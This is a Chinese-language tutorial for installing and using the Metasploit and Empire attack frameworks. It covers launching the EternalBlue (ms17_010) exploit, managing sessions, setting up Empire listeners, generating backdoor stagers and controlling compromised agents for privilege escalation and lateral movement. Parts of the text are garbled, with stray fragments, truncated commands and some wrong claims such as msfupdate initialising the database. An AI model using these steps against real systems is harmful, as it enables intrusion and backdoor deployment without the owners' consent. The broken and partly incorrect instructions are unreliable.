下载 Metasploit：

• 访问 Metasploit 官方网站（metasploit.com）下载最新版本的 Metasploit 框架。
• destek377-rc尔.注意：随着时间推移，Metasploit 软件包名可能会有所变化，建议下载最新版本以确保兼容性。

安装步骤：

• Windows：
  • 下载并运行安装文件，按照提示完成安装。
    -，默认情况下，Metasploit 会被安装在 C:\metasploit 或类似的默认路径。
• Linux：
  • 使用包管理器安装。例如，在 Debian 系stem中运行以下命令：

  sudo apt-get install metasploit-framework

  为避免依赖冲突，可以选择手动安装或在虚拟机中进行操作。

• macOS：
  • 使用 Homebrew 软件安装：

  brew install metasploit

  或者手动下载并解压安装包。

启动 Metasploit：

• 安装完成后，可以通过命令行运行 Metasploit 控制台：

msfconsole

• 如果没有安装 Metasploit 的数据库，您需要使用 msfupdate 命令首次初始化数据库：

msfupdate

更新数据库：

• 首次使用时，运行 msfupdate 命令以更新 Metasploit 数据库：

msfupdate

• 这会下载所有可用的漏洞利用模块。

查找漏洞利用模块：

• 使用 search 命令搜索特定漏洞利用模块。例如，搜索针对 Windows SMB服务器的永恒蓝色漏洞：

search ms17_010

• 这将显示与该漏洞相关的所有利用模块及其详细信息。

使用漏洞利用模块：

• 使用 use exploit/<目标模块> 命令选择一个漏洞利用模块。例如，选择针对 Windows SMB 的模块：

use exploit/windows/smb/ms17_010_eternalblue

• 根据提示设置目标 IP 地址、端口等参数。
• 使用 exploit 命令执行漏洞利用：

exploit

• 如果漏洞利用成功，Metasploit 会返回成功信息，并提示您可以使用 sessions 命令查看当前会话。

管理会话：

• 获取会话：

sessions

• 输入目标系统的会话 ID 以查看会话详情：

sessions -i 
    

• 提交命令：

! 

• 最后，使用 logout 命令退出会话：

logout

准备环境：

• 建议使用 Kali Linux 等渗透测试发行版。
• 安装 Python 3.12 或更高版本，因为新版本的 Python 可能支持更多功能和修复了旧版本的漏洞。

克隆 Empire 项目：

• 运行以下命令从 GitHub 克隆 Empire 项目：

git clone --recursive https://github.com/BC-SECURITY/Empire.git

• 这会下载并克隆所有 Empire 项目的子模块。

安装 Empire：

• 首先进入 Empire 目录：

cd Empire/setup

• 执行安装脚本：

./install.sh

• 安装脚本会自动下载并安装所需的依赖。如果网络连接有问题，可以手动下载缺失的依赖文件并放置在相应的目录下。

设置数据库密码：

• 在安装过程中，可以选择为 Empire 数据库设置一个密码。这会用于加密存储的Empire 数据。如果您不需要设置密码，可以选择跳过这一步。

启动 Empire：

• 安装完成后，可以在 Empire 根目录下运行以下命令启动 Empire：

./empire

• 如果 Empire 已经启动，您会看到屏幕上显示 Empire CLI v1.2.0 等信息，以及一系列可用的命令和选项。

启动 Empire：

• 运行 ./empire 命令即可启动 Empire。

查看帮助文档：

• 在启动后，输入 help 命令查看 Empire 的基本命令和用法：

help

设置监听器：

• 使用 listeners 命令进入监听器设置界面：

listeners

• 选择 listen 型（如 HTTP listen 型），然后使用 info 命令查看该类型的详细信息：

info http

• 设置参数（如监听地址、端口等）：

set]   Agree？

• 输入 yes 后，设置参数完成后，使用 execute 命令启动监听器：

execute

生成后门：

• 设置好监听器后，使用 usestager 命令选择生成后门的类型（如 Windows 平台下的 HTA 文件）：

usestager windows/total供或者 HTTP/TunnelingStager 一类的模块。

• 查看生成器详情：

info 
    <模块名>

• 使用 execute 命令生成并执行后门：

execute

获取会话：

agents

• 使用 use agent 命令选择一个会话进行交互：

use 
    

• 如果目标机器运行后门文件，Empire 会为其分配一个新的会话。

与会话交互：

• 选择一个会话进行交互：

interact

• 在会话交互界面中，可以执行内网信息收集、提权、横向移动等操作。